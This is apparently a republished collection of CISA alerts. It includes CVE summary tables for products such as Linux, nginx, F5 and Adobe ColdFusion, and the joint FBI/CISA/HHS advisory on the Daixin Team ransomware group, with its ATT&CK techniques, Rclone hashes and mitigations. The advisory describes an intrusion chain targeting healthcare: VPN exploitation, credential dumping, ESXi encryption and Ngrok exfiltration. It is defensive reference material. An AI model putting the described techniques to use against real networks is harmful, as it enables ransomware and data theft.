dell — powerscale_onefs	Dell PowerScale OneFS, versions 8.2.x-9.4.0.x, contain a privilege context switching error. A local authenticated malicious user with high privileges could potentially exploit this vulnerability, leading to full system compromise. This impacts compliance mode clusters.	2022-10-21	not yet calculated	CVE-2022-34438 CONFIRM
dell — powerscale_onefs	Dell PowerScale OneFS, versions 8.2.0.x-9.4.0.x contain allocation of Resources Without Limits or Throttling vulnerability. A remote unauthenticated attacker could potentially exploit this vulnerability, leading to denial of service and performance issue on that node.	2022-10-21	not yet calculated	CVE-2022-34439 CONFIRM
dell — powerscale_onefs	Dell PowerScale OneFS, versions 9.0.0 up to and including 9.1.0.19, 9.2.1.12, and 9.3.0.6, contain sensitive data in log files vulnerability. A privileged local user may potentially exploit this vulnerability, leading to disclosure of this sensitive data.	2022-10-21	not yet calculated	CVE-2022-31239 CONFIRM
dell — powerstore	Dell PowerStore versions 2.1.0.x contain an Authentication bypass vulnerability. A remote unauthenticated attacker could potentially exploit this vulnerability under specific configuration. An attacker would gain unauthorized access upon successful exploit.	2022-10-21	not yet calculated	CVE-2022-26870 CONFIRM
exim — exim	A vulnerability was found in Exim and classified as problematic. This issue affects the function dmarc_dns_lookup of the file dmarc.c of the component DMARC Handler. The manipulation leads to use after free. The attack may be initiated remotely. The name of the patch is 12fb3842f81bcbd4a4519d5728f2d7e0e3ca1445. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-211919.	2022-10-20	not yet calculated	CVE-2022-3620 N/A N/A
f5 — big-ip	In versions 16.1.x before 16.1.3.1, 15.1.x before 15.1.6.1, 14.1.x before 14.1.5, and all versions of 13.1.x, when BIG-IP is provisioned with PEM or AFM module, an undisclosed input can cause Traffic Management Microkernel (TMM) to terminate.	2022-10-19	not yet calculated	CVE-2022-41813 MISC
f5 — big-ip	In BIG-IP versions 17.0.x before 17.0.0.1, 16.1.x before 16.1.3.1, 15.1.x before 15.1.6.1, 14.1.x before 14.1.5.1, and 13.1.x before 13.1.5.1, when a SIP profile is configured on a virtual server, undisclosed messages can cause an increase in memory resource utilization.	2022-10-19	not yet calculated	CVE-2022-41832 MISC
f5 — big-ip	In all BIG-IP 13.1.x versions, when an iRule containing the HTTP::collect command is configured on a virtual server, undisclosed requests can cause Traffic Management Microkernel (TMM) to terminate.	2022-10-19	not yet calculated	CVE-2022-41833 MISC
f5 — big-ip	When an ‘Attack Signature False Positive Mode’ enabled security policy is configured on a virtual server, undisclosed requests can cause the bd process to terminate.	2022-10-19	not yet calculated	CVE-2022-41836 MISC
f5 — big-ip	On specific hardware platforms, on BIG-IP versions 16.1.x before 16.1.3.1, 15.1.x before 15.1.7, 14.1.x before 14.1.5.1, and all versions of 13.1.x, while Intel QAT (QuickAssist Technology) and the AES-GCM/CCM cipher is in use, undisclosed conditions can cause BIG-IP to send data unencrypted even with an SSL Profile applied.	2022-10-19	not yet calculated	CVE-2022-41983 MISC
f5 — multiple_products	In F5OS-A version 1.x before 1.1.0 and F5OS-C version 1.x before 1.5.0, excessive file permissions in F5OS allows an authenticated local attacker to execute limited set of commands in a container and impact the F5OS controller.	2022-10-19	not yet calculated	CVE-2022-41835 MISC
flux — flux	Flux is an open and extensible continuous delivery solution for Kubernetes. Versions prior to 0.35.0 are subject to a Denial of Service. Users that have permissions to change Fluxâ€™s objects, either through a Flux source or directly within a cluster, can provide invalid data to fields `.spec.interval` or `.spec.timeout` (and structured variations of these fields), causing the entire object type to stop being processed. This issue is patched in version 0.35.0. As a workaround, Admission controllers can be employed to restrict the values that can be used for fields `.spec.interval` and `.spec.timeout`, however upgrading to the latest versions is still the recommended mitigation.	2022-10-22	not yet calculated	CVE-2022-39272 CONFIRM MISC
iowow — iowow	IOWOW is a C utility library and persistent key/value storage engine. Versions 1.4.15 and prior contain a stack buffer overflow vulnerability that allows for Denial of Service (DOS) when it parses scientific notation numbers present in JSON. A patch for this issue is available at commit a79d31e4cff1d5a08f665574b29fd885897a28fd in the `master` branch of the repository. There are no workarounds other than applying the patch.	2022-10-21	not yet calculated	CVE-2022-23462 CONFIRM MISC
jadx — jadx	jadx is a set of command line and GUI tools for producing Java source code from Android Dex and Apk files. versions prior to 1.4.5 are subject to a Denial of Service when opening zip files with HTML sequences. This issue has been patched in version 1.4.5. There are no known workarounds.	2022-10-21	not yet calculated	CVE-2022-39259 CONFIRM
jenkins — multiple_products	A sandbox bypass vulnerability in Jenkins Pipeline: Deprecated Groovy Libraries Plugin 583.vf3b_454e43966 and earlier allows attackers with permission to define untrusted Pipeline libraries and to define and run sandboxed scripts, including Pipelines, to bypass the sandbox protection and execute arbitrary code in the context of the Jenkins controller JVM.	2022-10-19	not yet calculated	CVE-2022-43406 CONFIRM MLIST
linux — linux_kernel	A vulnerability was found in Linux Kernel. It has been classified as problematic. Affected is the function nilfs_bmap_lookup_at_level of the file fs/nilfs2/inode.c of the component nilfs2. The manipulation leads to null pointer dereference. It is possible to launch the attack remotely. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-211920.	2022-10-20	not yet calculated	CVE-2022-3621 N/A N/A
linux — linux_kernel	A vulnerability was found in Linux Kernel. It has been declared as problematic. Affected by this vulnerability is the function follow_page_pte of the file mm/gup.c of the component BPF. The manipulation leads to race condition. The attack can be launched remotely. It is recommended to apply a patch to fix this issue. The identifier VDB-211921 was assigned to this vulnerability.	2022-10-20	not yet calculated	CVE-2022-3623 N/A N/A
linux — linux_kernel	A vulnerability was found in Linux Kernel and classified as problematic. Affected by this issue is the function rlb_arp_xmit of the file drivers/net/bonding/bond_alb.c of the component IPsec. The manipulation leads to memory leak. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-211928.	2022-10-21	not yet calculated	CVE-2022-3624 N/A N/A
linux — linux_kernel	A vulnerability was found in Linux Kernel. It has been classified as critical. This affects the function devlink_param_set/devlink_param_get of the file net/core/devlink.c of the component IPsec. The manipulation leads to use after free. It is recommended to apply a patch to fix this issue. The identifier VDB-211929 was assigned to this vulnerability.	2022-10-21	not yet calculated	CVE-2022-3625 N/A N/A
linux — linux_kernel	A vulnerability was found in Linux Kernel. It has been declared as problematic. This vulnerability affects the function vsock_connect of the file net/vmw_vsock/af_vsock.c of the component IPsec. The manipulation leads to memory leak. It is recommended to apply a patch to fix this issue. VDB-211930 is the identifier assigned to this vulnerability.	2022-10-21	not yet calculated	CVE-2022-3629 N/A N/A
linux — linux_kernel	A vulnerability was found in Linux Kernel. It has been rated as problematic. This issue affects some unknown processing of the file fs/fscache/cookie.c of the component IPsec. The manipulation leads to memory leak. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-211931.	2022-10-21	not yet calculated	CVE-2022-3630 N/A N/A
linux — linux_kernel	A vulnerability classified as problematic has been found in Linux Kernel. Affected is the function j1939_session_destroy of the file net/can/j1939/transport.c of the component IPsec. The manipulation leads to memory leak. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-211932.	2022-10-21	not yet calculated	CVE-2022-3633 MISC MISC
linux — linux_kernel	A vulnerability, which was classified as critical, has been found in Linux Kernel. Affected by this issue is the function tst_timer of the file drivers/atm/idt77252.c of the component IPsec. The manipulation leads to use after free. It is recommended to apply a patch to fix this issue. VDB-211934 is the identifier assigned to this vulnerability.	2022-10-21	not yet calculated	CVE-2022-3635 N/A N/A
linux — linux_kernel	A vulnerability, which was classified as critical, was found in Linux Kernel. This affects the function __mtk_ppe_check_skb of the file drivers/net/ethernet/mediatek/mtk_ppe.c of the component Ethernet Handler. The manipulation leads to use after free. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-211935.	2022-10-21	not yet calculated	CVE-2022-3636 N/A N/A
linux — linux_kernel	A vulnerability, which was classified as critical, was found in Linux Kernel. Affected is the function l2cap_conn_del of the file net/bluetooth/l2cap_core.c of the component Bluetooth. The manipulation leads to use after free. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-211944.	2022-10-21	not yet calculated	CVE-2022-3640 MISC MISC
linux — linux_kernel	A vulnerability classified as problematic has been found in Linux Kernel. This affects the function rtl8188f_spur_calibration of the file drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_8188f.c of the component Wireless. The manipulation of the argument hw_ctrl_s1/sw_ctrl_s1 leads to use of uninitialized variable. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-211959.	2022-10-21	not yet calculated	CVE-2022-3642 MISC MISC
linux — linux_kernel	A vulnerability, which was classified as problematic, has been found in Linux Kernel. This issue affects the function nilfs_attach_log_writer of the file fs/nilfs2/segment.c of the component BPF. The manipulation leads to memory leak. The attack may be initiated remotely. It is recommended to apply a patch to fix this issue. The identifier VDB-211961 was assigned to this vulnerability.	2022-10-21	not yet calculated	CVE-2022-3646 N/A N/A
linux — linux_kernel	A vulnerability was found in Linux Kernel. It has been classified as problematic. Affected is the function nilfs_new_inode of the file fs/nilfs2/inode.c of the component BPF. The manipulation leads to use after free. It is possible to launch the attack remotely. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-211992.	2022-10-21	not yet calculated	CVE-2022-3649 N/A N/A
nginx — nginx	NGINX Open Source before versions 1.23.2 and 1.22.1, NGINX Open Source Subscription before versions R2 P1 and R1 P1, and NGINX Plus before versions R27 P1 and R26 P1 have a vulnerability in the module ngx_http_mp4_module that might allow a local attacker to corrupt NGINX worker memory, resulting in its termination or potential other impact using a specially crafted audio or video file. The issue affects only NGINX products that are built with the ngx_http_mp4_module, when the mp4 directive is used in the configuration file. Further, the attack is possible only if an attacker can trigger processing of a specially crafted audio or video file with the module ngx_http_mp4_module.	2022-10-19	not yet calculated	CVE-2022-41741 MISC
nginx — nginx	NGINX Open Source before versions 1.23.2 and 1.22.1, NGINX Open Source Subscription before versions R2 P1 and R1 P1, and NGINX Plus before versions R27 P1 and R26 P1 have a vulnerability in the module ngx_http_mp4_module that might allow a local attacker to cause a worker process crash, or might result in worker process memory disclosure by using a specially crafted audio or video file. The issue affects only NGINX products that are built with the module ngx_http_mp4_module, when the mp4 directive is used in the configuration file. Further, the attack is possible only if an attacker can trigger processing of a specially crafted audio or video file with the module ngx_http_mp4_module.	2022-10-19	not yet calculated	CVE-2022-41742 MISC
nginx — nginx	A vulnerability was found in Nginx and classified as problematic. This issue affects some unknown processing of the file ngx_resolver.c of the component IPv4 Off Handler. The manipulation leads to memory leak. The attack may be initiated remotely. It is recommended to apply a patch to fix this issue. The identifier VDB-211937 was assigned to this vulnerability.	2022-10-21	not yet calculated	CVE-2022-3638 N/A N/A N/A
redis — redis	A vulnerability, which was classified as problematic, was found in Redis. Affected is the function sigsegvHandler of the file debug.c of the component Crash Report. The manipulation leads to denial of service. The name of the patch is 0bf90d944313919eb8e63d3588bf63a367f020a3. It is recommended to apply a patch to fix this issue. VDB-211962 is the identifier assigned to this vulnerability.	2022-10-21	not yet calculated	CVE-2022-3647 N/A N/A
siemens — sieviellance_video_mobile_server_v2022_r2	A vulnerability has been identified in Siveillance Video Mobile Server V2022 R2 (All versions < V22.2a (80)). The mobile server component of affected applications improperly handles the log in for Active Directory accounts that are part of Administrators group. This could allow an unauthenticated remote attacker to access the application without a valid account.	2022-10-21	not yet calculated	CVE-2022-43400 MISC
softing — opc_ua_c++_sdk	An issue was discovered in Softing OPC UA C++ SDK before 6.10. A buffer overflow or an excess allocation happens due to unchecked array and matrix bounds in structure data types.	2022-10-20	not yet calculated	CVE-2022-37453 MISC MISC
softing — opc_ua_c++_sdk	An issue was discovered in Softing OPC UA C++ SDK 5.66 through 6.x before 6.10. An OPC/UA browse request exceeding the server limit on continuation points may cause a use-after-free error	2022-10-20	not yet calculated	CVE-2022-39823 MISC MISC
stmicroelectronics — stmicroelectronics	A buffer overflow vulnerability in stm32_mw_usb_host of STMicroelectronics allows an attacker to execute arbitrary code when the descriptor contains more endpoints than USBH_MAX_NUM_ENDPOINTS. The library is typically integrated when using a RTOS such as FreeRTOS on STM32 MCUs.	2022-10-21	not yet calculated	CVE-2021-42553 CONFIRM
wordpress — wordpress	Auth. WordPress Options Change (siteurl, users_can_register, default_role, admin_email and new_admin_email) vulnerability in Biplob Adhikari’s Accordions – Multiple Accordions or FAQs Builder plugin (versions <= 2.0.3 on WordPress.	2022-10-21	not yet calculated	CVE-2022-38104 CONFIRM CONFIRM
xkcp — keccak_xkcp_sha-3	The Keccak XKCP SHA-3 reference implementation before fdc6fef has an integer overflow and resultant buffer overflow that allows attackers to execute arbitrary code or eliminate expected cryptographic properties. This occurs in the sponge function interface.	2022-10-21	not yet calculated	CVE-2022-37454 MISC MISC MISC MISC

This product is provided subject to this Notification and this Privacy & Use policy.

alerts

#StopRansomware: Daixin Team

Post author By admin
Post date October 21, 2022

Original release date: October 21, 2022

CISA, the Federal Bureau of Investigation (FBI), and the Department of Health and Human Services (HHS) have released a joint Cybersecurity Advisory (CSA), #StopRansomware: Daixin Team to provide information on the “Daixin Team,” a cybercrime group actively targeting U.S. businesses, predominantly in the Healthcare and Public Health (HPH) Sector, with ransomware and data extortion operations. This joint CSA provides Daixin actors’ tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) obtained from FBI threat response activities and third-party reporting.

CISA encourages HPH Sector organizations to review #StopRansomware: Daixin Team and to apply the recommended Mitigations. See StopRansomware.gov for additional guidance on ransomware protection, detection, and response.

This product is provided subject to this Notification and this Privacy & Use policy.

alerts

AA22-294A: #StopRansomware: Daixin Team

Post author By admin
Post date October 21, 2022

Original release date: October 21, 2022

Summary

Actions to take today to mitigate cyber threats from ransomware:

• Install updates for operating systems, software, and firmware as soon as they are released.
• Require phishing-resistant MFA for as many services as possible.
• Train users to recognize and report phishing attempts.

Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.

The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and Department of Health and Human Services (HHS) are releasing this joint CSA to provide information on the “Daixin Team,” a cybercrime group that is actively targeting U.S. businesses, predominantly in the Healthcare and Public Health (HPH) Sector, with ransomware and data extortion operations.

This joint CSA provides TTPs and IOCs of Daixin actors obtained from FBI threat response activities and third-party reporting.

Download the PDF version of this report: pdf, 591 KB

Technical Details

Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 11. See MITRE ATT&CK for Enterprise for all referenced tactics and techniques.

Cybercrime actors routinely target HPH Sector organizations with ransomware:

As of October 2022, per FBI Internet Crime Complaint Center (IC3) data, specifically victim reports across all 16 critical infrastructure sectors, the HPH Sector accounts for 25 percent of ransomware complaints.
According to an IC3 annual report in 2021, 649 ransomware reports were made across 14 critical infrastructure sectors; the HPH Sector accounted for the most reports at 148.

The Daixin Team is a ransomware and data extortion group that has targeted the HPH Sector with ransomware and data extortion operations since at least June 2022. Since then, Daixin Team cybercrime actors have caused ransomware incidents at multiple HPH Sector organizations where they have:

Deployed ransomware to encrypt servers responsible for healthcare services—including electronic health records services, diagnostics services, imaging services, and intranet services, and/or
Exfiltrated personal identifiable information (PII) and patient health information (PHI) and threatened to release the information if a ransom is not paid.

Daixin actors gain initial access to victims through virtual private network (VPN) servers. In one confirmed compromise, the actors likely exploited an unpatched vulnerability in the organization’s VPN server [T1190]. In another confirmed compromise, the actors used previously compromised credentials to access a legacy VPN server [T1078] that did not have multifactor authentication (MFA) enabled. The actors are believed to have acquired the VPN credentials through the use of a phishing email with a malicious attachment [T1598.002].

After obtaining access to the victim’s VPN server, Daixin actors move laterally via Secure Shell (SSH) [T1563.001] and Remote Desktop Protocol (RDP) [T1563.002]. Daixin actors have sought to gain privileged account access through credential dumping [T1003] and pass the hash [T1550.002]. The actors have leveraged privileged accounts to gain access to VMware vCenter Server and reset account passwords [T1098] for ESXi servers in the environment. The actors have then used SSH to connect to accessible ESXi servers and deploy ransomware [T1486] on those servers.

According to third-party reporting, the Daixin Team’s ransomware is based on leaked Babuk Locker source code. This third-party reporting as well as FBI analysis show that the ransomware targets ESXi servers and encrypts files located in /vmfs/volumes/ with the following extensions: .vmdk, .vmem, .vswp, .vmsd, .vmx, and .vmsn. A ransom note is also written to /vmfs/volumes/. See Figure 1 for targeted file system path and Figure 2 for targeted file extensions list. Figure 3 and Figure 4 include examples of ransom notes. Note that in the Figure 3 ransom note, Daixin actors misspell “Daixin” as “Daxin.”

Figure 1: Daixin Team – Ransomware Targeted File Path

Figure 2: Daixin Team – Ransomware Targeted File Extensions

Figure 3: Example 1 of Daixin Team Ransomware Note

Figure 4: Example 2 of Daixin Team Ransomware Note

In addition to deploying ransomware, Daixin actors have exfiltrated data [TA0010] from victim systems. In one confirmed compromise, the actors used Rclone—an open-source program to manage files on cloud storage—to exfiltrate data to a dedicated virtual private server (VPS). In another compromise, the actors used Ngrok—a reverse proxy tool for proxying an internal service out onto an Ngrok domain—for data exfiltration [T1567].

MITRE ATT&CK TACTICS AND TECHNIQUES

See Table 1 for all referenced threat actor tactics and techniques included in this advisory.

Table 1: Daixin Actors’ ATT&CK Techniques for Enterprise

Reconnaissance
Technique Title	ID	Use
Phishing for Information: Spearphishing Attachment	T1598.002	Daixin actors have acquired the VPN credentials (later used for initial access) by a phishing email with a malicious attachment.
Initial Access
Technique Title	ID	Use
Exploit Public-Facing Application	T1190	Daixin actors exploited an unpatched vulnerability in a VPN server to gain initial access to a network.
Valid Accounts	T1078	Daixin actors use previously compromised credentials to access servers on the target network.
Persistence
Technique Title	ID	Use
Account Manipulation	T1098	Daixin actors have leveraged privileged accounts to reset account passwords for VMware ESXi servers in the compromised environment.
Credential Access
Technique Title	ID	Use
OS Credential Dumping	T1003	Daixin actors have sought to gain privileged account access through credential dumping.
Lateral Movement
Technique Title	ID	Use
Remote Service Session Hijacking: SSH Hijacking	T1563.001	Daixin actors use SSH and RDP to move laterally across a network.
Remote Service Session Hijacking: RDP Hijacking	T1563.002	Daixin actors use RDP to move laterally across a network.
Use Alternate Authentication Material: Pass the Hash	T1550.002	Daixin actors have sought to gain privileged account access through pass the hash.
Exfiltration
Technique Title	ID	Use
Exfiltration Over Web Service	T1567	Daixin Team members have used Ngrok for data exfiltration over web servers.
Impact
Technique Title	ID	Use
Data Encrypted for Impact	T1486	Daixin actors have encrypted data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources.

INDICATORS OF COMPROMISE

See Table 2 for IOCs obtained from third-party reporting.

Table 2: Daixin Team IOCs – Rclone Associated SHA256 Hashes

File	SHA256
rclone-v1.59.2-windows-amd64git-log.txt	9E42E07073E03BDEA4CD978D9E7B44A9574972818593306BE1F3DCFDEE722238
rclone-v1.59.2-windows-amd64rclone.1	19ED36F063221E161D740651E6578D50E0D3CACEE89D27A6EBED4AB4272585BD
rclone-v1.59.2-windows-amd64rclone.exe	54E3B5A2521A84741DC15810E6FED9D739EB8083CB1FE097CB98B345AF24E939
rclone-v1.59.2-windows-amd64README.html	EC16E2DE3A55772F5DFAC8BF8F5A365600FAD40A244A574CBAB987515AA40CBF
rclone-v1.59.2-windows-amd64README.txt	475D6E80CF4EF70926A65DF5551F59E35B71A0E92F0FE4DD28559A9DEBA60C28

Mitigations

FBI, CISA, and HHS urge HPH Sector organizations to implement the following to protect against Daixin and related malicious activity:

Install updates for operating systems, software, and firmware as soon as they are released. Prioritize patching VPN servers, remote access software, virtual machine software, and known exploited vulnerabilities. Consider leveraging a centralized patch management system to automate and expedite the process.
Require phishing-resistant MFA for as many services as possible—particularly for webmail, VPNs, accounts that access critical systems, and privileged accounts that manage backups.
If you use Remote Desktop Protocol (RDP), secure and monitor it.
- Limit access to resources over internal networks, especially by restricting RDP and using virtual desktop infrastructure. After assessing risks, if RDP is deemed operationally necessary, restrict the originating sources, and require multifactor authentication (MFA) to mitigate credential theft and reuse. If RDP must be available externally, use a virtual private network (VPN), virtual desktop infrastructure, or other means to authenticate and secure the connection before allowing RDP to connect to internal devices. Monitor remote access/RDP logs, enforce account lockouts after a specified number of attempts to block brute force campaigns, log RDP login attempts, and disable unused remote access/RDP ports.
- Ensure devices are properly configured and that security features are enabled. Disable ports and protocols that are not being used for business purposes (e.g., RDP Transmission Control Protocol Port 3389).
Turn off SSH and other network device management interfaces such as Telnet, Winbox, and HTTP for wide area networks (WANs) and secure with strong passwords and encryption when enabled.
Implement and enforce multi-layer network segmentation with the most critical communications and data resting on the most secure and reliable layer.
Limit access to data by deploying public key infrastructure and digital certificates to authenticate connections with the network, Internet of Things (IoT) medical devices, and the electronic health record system, as well as to ensure data packages are not manipulated while in transit from man-in-the-middle attacks.
Use standard user accounts on internal systems instead of administrative accounts, which allow for overarching administrative system privileges and do not ensure least privilege.
Secure PII/PHI at collection points and encrypt the data at rest and in transit by using technologies such as Transport Layer Security (TPS). Only store personal patient data on internal systems that are protected by firewalls, and ensure extensive backups are available if data is ever compromised.
Protect stored data by masking the permanent account number (PAN) when it is displayed and rendering it unreadable when it is stored—through cryptography, for example.
Secure the collection, storage, and processing practices for PII and PHI, per regulations such as the Health Insurance Portability and Accountability Act of 1996 (HIPAA). Implementing HIPAA security measures can prevent the introduction of malware on the system.
Use monitoring tools to observe whether IoT devices are behaving erratically due to a compromise.
Create and regularly review internal policies that regulate the collection, storage, access, and monitoring of PII/PHI.
In addition, the FBI, CISA, and HHS urge all organizations, including HPH Sector organizations, to apply the following recommendations to prepare for, mitigate/prevent, and respond to ransomware incidents.

Preparing for Ransomware

Maintain offline (i.e., physically disconnected) backups of data, and regularly test backup and restoration. These practices safeguard an organization’s continuity of operations or at least minimize potential downtime from a ransomware incident and protect against data losses.
- Ensure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization’s data infrastructure.
Create, maintain, and exercise a basic cyber incident response plan and associated communications plan that includes response procedures for a ransomware incident.
- Organizations should also ensure their incident response and communications plans include response and notification procedures for data breach incidents. Ensure the notification procedures adhere to applicable state laws.
  - Refer to applicable state data breach laws and consult legal counsel when necessary.
  - For breaches involving electronic health information, you may need to notify the Federal Trade Commission (FTC) or the Department of Health and Human Services, and—in some cases—the media. Refer to the FTC’s Health Breach Notification Rule and U.S. Department of Health and Human Services’ Breach Notification Rule for more information.
- See CISA-Multi-State Information Sharing and Analysis Center (MS-ISAC) Joint Ransomware Guide and CISA Fact Sheet, Protecting Sensitive and Personal Information from Ransomware-Caused Data Breaches, for information on creating a ransomware response checklist and planning and responding to ransomware-caused data breaches.

Mitigating and Preventing Ransomware

Restrict Server Message Block (SMB) Protocol within the network to only access servers that are necessary and remove or disable outdated versions of SMB (i.e., SMB version 1). Threat actors use SMB to propagate malware across organizations.
Review the security posture of third-party vendors and those interconnected with your organization. Ensure all connections between third-party vendors and outside software or hardware are monitored and reviewed for suspicious activity.
Implement listing policies for applications and remote access that only allow systems to execute known and permitted programs.
Open document readers in protected viewing modes to help prevent active content from running.
Implement user training program and phishing exercises to raise awareness among users about the risks of visiting suspicious websites, clicking on suspicious links, and opening suspicious attachments. Reinforce the appropriate user response to phishing and spearphishing emails.
Use strong passwords and avoid reusing passwords for multiple accounts. See CISA Tip Choosing and Protecting Passwords and the National Institute of Standards and Technology’s (NIST’s) Special Publication 800-63B: Digital Identity Guidelines for more information.
Require administrator credentials to install software.
Audit user accounts with administrative or elevated privileges and configure access controls with least privilege in mind.
Install and regularly update antivirus and antimalware software on all hosts.
Only use secure networks and avoid using public Wi-Fi networks. Consider installing and using a VPN.
Consider adding an email banner to messages coming from outside your organizations.
Disable hyperlinks in received emails.

Responding to Ransomware Incidents

If a ransomware incident occurs at your organization:

Follow your organization’s Ransomware Response Checklist (see Preparing for Ransomware section).
Scan backups. If possible, scan backup data with an antivirus program to check that it is free of malware. This should be performed using an isolated, trusted system to avoid exposing backups to potential compromise.
Follow the notification requirements as outlined in your cyber incident response plan.
Report incidents to the FBI at a local FBI Field Office, CISA at cisa.gov/report, or the U.S. Secret Service (USSS) at a USSS Field Office.
Apply incident response best practices found in the joint Cybersecurity Advisory, Technical Approaches to Uncovering and Remediating Malicious Activity, developed by CISA and the cybersecurity authorities of Australia, Canada, New Zealand, and the United Kingdom.

Note: FBI, CISA, and HHS strongly discourage paying ransoms as doing so does not guarantee files and records will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities.

REFERENCES

Stopransomware.gov is a whole-of-government approach that gives one central location for ransomware resources and alerts.
Resource to mitigate a ransomware attack: CISA-Multi-State Information Sharing and Analysis Center (MS-ISAC) Joint Ransomware Guide.
No-cost cyber hygiene services: Cyber Hygiene Services and Ransomware Readiness Assessment.
Ongoing Threat Alerts and Sector alerts are produced by the Health Sector Cybersecurity Coordination Center (HC3) and can be found at hhs.gov/HC3
For additional best practices for Healthcare cybersecurity issues see the HHS 405(d) Aligning Health Care Industry Security Approaches at 405d.hhs.gov

REPORTING

The FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with Daixin Group actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. Regardless of whether you or your organization have decided to pay the ransom, the FBI, CISA, and HHS urge you to promptly report ransomware incidents to a local FBI Field Office, or CISA at cisa.gov/report.

ACKNOWLEDGEMENTS

FBI, CISA, and HHS would like to thank CrowdStrike and the Health Information Sharing and Analysis Center (Health-ISAC) for their contributions to this CSA.

DISCLAIMER

The information in this report is being provided “as is” for informational purposes only. FBI, CISA, and HHS do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI, CISA, or HHS.

Revisions

Initial Publication: October 21, 2022

This product is provided subject to this Notification and this Privacy & Use policy.

alerts

Cisco Releases Security Update for Cisco Identity Services Engine

Post author By admin
Post date October 21, 2022

Original release date: October 21, 2022

Cisco has released a security update to address vulnerabilities affecting Cisco Identity Services Engine (ISE). A remote attacker could exploit some of these vulnerabilities to take control of an affected system. For updates addressing high and low severity vulnerabilities, see the Cisco Security Advisories page.

CISA encourages users and administrators to review Cisco Advisory cisco-sa-ise-path-trav-Dz5dpzyM and apply the necessary updates.

This product is provided subject to this Notification and this Privacy & Use policy.

alerts

Vulnerability Summary for the Week of October 10, 2022

Post author By admin
Post date October 18, 2022

Original release date: October 17, 2022 | Last revised: October 18, 2022

High Vulnerabilities

Primary Vendor — Product	Description	Published	CVSS Score	Source & Patch Info
adobe — acrobat_reader	Adobe Acrobat Reader versions 22.002.20212 (and earlier) and 20.005.30381 (and earlier) are affected by a Stack-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.	2022-10-14	7.8	CVE-2022-42339 MISC
adobe — acrobat_reader	Adobe Acrobat Reader versions 22.002.20212 (and earlier) and 20.005.30381 (and earlier) are affected by a Stack-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.	2022-10-14	7.8	CVE-2022-38450 MISC
adobe — coldfusion	Adobe ColdFusion versions Update 14 (and earlier) and Update 4 (and earlier) are affected by a Use of Hard-coded Credentials vulnerability that could result in application denial-of-service by gaining access to start/stop arbitrary services. Exploitation of this issue does not require user interaction.	2022-10-14	7.5	CVE-2022-38420 MISC
adobe — coldfusion	Adobe ColdFusion versions Update 14 (and earlier) and Update 4 (and earlier) are affected by an Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’) vulnerability that could result in information disclosure. Exploitation of this issue does not require user interaction.	2022-10-14	7.5	CVE-2022-38422 MISC
adobe — coldfusion	Adobe ColdFusion versions Update 14 (and earlier) and Update 4 (and earlier) are affected by an Improper Input Validation vulnerability that could result in arbitrary file system read. Exploitation of this issue does not require user interaction.	2022-10-14	7.5	CVE-2022-42340 MISC
adobe — coldfusion	Adobe ColdFusion versions Update 14 (and earlier) and Update 4 (and earlier) are affected by an Improper Restriction of XML External Entity Reference (‘XXE’) vulnerability that could result in arbitrary file system read. Exploitation of this issue does not require user interaction.	2022-10-14	7.5	CVE-2022-42341 MISC
adobe — coldfusion	Adobe ColdFusion versions Update 14 (and earlier) and Update 4 (and earlier) are affected by a Stack-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue does not require user interaction, the vulnerability is triggered when a crafted network packet is sent to the server.	2022-10-14	9.8	CVE-2022-35710 MISC
adobe — coldfusion	Adobe ColdFusion versions Update 14 (and earlier) and Update 4 (and earlier) are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue does not require user interaction, the vulnerability is triggered when a crafted network packet is sent to the server.	2022-10-14	9.8	CVE-2022-35711 MISC
adobe — coldfusion	Adobe ColdFusion versions Update 14 (and earlier) and Update 4 (and earlier) are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue does not require user interaction, the vulnerability is triggered when a crafted network packet is sent to the server.	2022-10-14	9.8	CVE-2022-35712 MISC
adobe — coldfusion	Adobe ColdFusion versions Update 14 (and earlier) and Update 4 (and earlier) are affected by an Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’) vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue does not require user interaction.	2022-10-14	9.8	CVE-2022-38418 MISC
adobe — coldfusion	Adobe ColdFusion versions Update 14 (and earlier) and Update 4 (and earlier) are affected by an Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’) vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue does not require user interaction, but does require administrator privileges.	2022-10-14	7.2	CVE-2022-38421 MISC
